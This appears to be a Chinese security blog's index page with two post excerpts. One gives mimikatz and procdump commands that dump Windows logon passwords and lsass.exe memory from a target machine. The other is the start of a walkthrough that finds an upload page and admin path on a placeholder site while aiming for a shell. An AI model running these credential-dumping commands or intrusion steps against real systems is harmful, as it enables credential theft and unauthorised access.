2019年11月3日
windows读密码的几种姿势
摘要: 1.mimikatz mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >>1.txt exit 2.procdump 1、在目标机器上执行 procdump.exe -accepteula -ma lsass.exe 阅读全文
posted @ 2019-11-03 17:11 cwkiller 阅读(887) 评论(0) 推荐(0) 编辑
一次峰回路转的getshell
摘要: 扫目录发现 http://www.xxx.test.cn/bak/以及/bak/upload.jsp 上传抓包看返回包,没有回显路径 于是盲猜找上传文件夹,无果。回到bak目录发现可疑js 访问bak/login_js/login.js 找到一处后台地址 访问/bak/admin_manager1/ 阅读全文
posted @ 2019-11-03 16:56 cwkiller 阅读(894) 评论(0) 推荐(0) 编辑